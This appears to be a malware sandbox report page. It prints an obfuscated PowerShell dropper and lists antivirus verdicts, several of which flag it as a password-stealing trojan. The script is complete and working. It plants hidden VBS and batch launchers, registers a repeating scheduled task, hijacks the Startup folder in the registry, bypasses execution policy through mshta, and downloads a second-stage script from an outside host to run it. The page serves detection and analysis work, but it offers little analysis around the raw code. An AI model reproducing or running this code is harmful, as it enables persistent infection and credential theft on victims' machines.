popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function WoRk
start-sleep -s 2
[system.io.directory]::CreateDirectory("C:\ProgramData\WindowsHost\")
New-Item -Path C:\ProgramData\WindowsHost\StateWindow.vbs -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'set alosh = wscript.createobject("WScript.shell")' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'alosh.run """C:\Users\Public\WindowsState.bat"" ", 0, true' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'Set alosh = Nothing' -Force
start-sleep -s 1
Get-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs
New-Item -Path C:\Users\Public\WindowsState.bat -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\Users\Public\WindowsState.bat -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\Users\Public\WindowsState.bat -Value 'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & ''C"+":"+"\"+"U"+"s"+"e"+"r"+"s"+"\"+"P"+"u"+"b"+"l"+"i"+"c"+"\statewindow.ps1''"", 0:close")' -Force
start-sleep -s 4
Get-Content -Path C:\Users\Public\WindowsState.bat
start-sleep -s 3
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\WindowsHost\StateWindow.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WindowsHost"
start-sleep -s 3
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost";
start-sleep -s 6
$DEV = 'C>><<<>><<<>>blic\'.Replace(">><<<>><<<>>",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://vintagebri.com/.1.txt', $DEV + 'statewindow.ps1')){
start-sleep -s 10
Start "C:\ProgramData\WindowsHost\StateWindow.vbs"
Start "C:\ProgramData\WindowsHost\StateWindow.vbs"
IEX WoRk
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb PowerShell.DownLoader.1403
MicroWorld-eScan Trojan.PWS.Agent.SVN
FireEye Trojan.PWS.Agent.SVN
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
ESET-NOD32 VBS/Runner.NQD
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Trojan.PWS.Agent.SVN
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Trojan.PWS.Agent.SVN
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Avira TR/PShell.PRL
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.PWS.Agent.SVN
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
VBA32 Clean
ALYac Trojan.PWS.Agent.SVN
MAX malware (ai score=83)
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
No IRMA results available.